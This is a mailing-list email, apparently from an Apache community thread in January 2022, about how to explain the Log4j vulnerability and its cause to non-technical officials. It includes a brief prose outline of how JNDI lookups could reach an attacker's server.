Hi. Le lun. 17 janv. 2022 à 02:20, Sam Ruby <[email protected]> a écrit : > > On Sun, Jan 16, 2022 at 6:59 PM Gilles Sadowski <[email protected]> > wrote: > > > Le dim. 16 janv. 2022 à 22:27, Sam Ruby <[email protected]> a écrit : > > > > > > On Sun, Jan 16, 2022 at 1:49 PM Dominik Psenner <[email protected]> > > wrote: > > > > > > > I have no intention to tear apart the document. I am dealing with non > > > > technical fellows on a daily basis and from my experience the document > > > > still too technical. > > > > > > > > > > That's what I was afraid of, and what I very much want to fix. > > > > From [1]: > > ---CUT--- > > Log4j is a chunk of laptop code that builders can put into purposes > > to watch, or “log”, something from mundane operations to vital alerts. > > Those detailed logs may also help programmers debug software and > > is used by tens of millions of purposes. > > ---CUT--- > > > > How much less technical can it be? > > > > > No. They've read that. It doesn't answer their questions. They have come > to us to get the answers. > > Analogy: my car is broken. I take it in to be fixed. The mechanic starts > to explain how the car works. I stop him and ask him how much the car will > cost to be fixed and when it will be ready. The mechanic responds by > explaining how the car works in simpler terms. > > Feel free to update the page, but my opinion is that the description you > cited doesn't answer any question the user may be wanting to ask.
Of course, I agree that it neither explains the issue, nor is it a plan to "ensure that it doesn't happen again". My point was only that further simplification cannot be the basis of a constructive discussion. Daniel Shahaf showed brilliantly that a wrong analogy and a wrong association could "simply" (but wrongly) identify the cause as "open source". > See > below. > > [...] Thanks for the description of the discussion that took place and the (unfortunately, not surprising) mindset of the attendance. > > I would love to move everything currently on that page to be background > material or delete it entirely and start over if we can find a way to > address the questions I describe above. Heck the background material could > even go into how JNDI extends LDAP to cover Java Objects, and log4j allowed > (past tense) the data to be logged to point their queries at an attacker's > server who could respond not with the answer to the question posed but with > instructions on how to load their Java Object, and why that is a very bad > thing, and how you had to know about things like CORBA and RMI that were > popular 25 years ago to even figure this out. I think that it is (or will be) quite useful to have such technical details when (some of the) "staffers" get to the point where they can make some sense out of it, and consequently focus on the right questions. Regards, Gilles --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
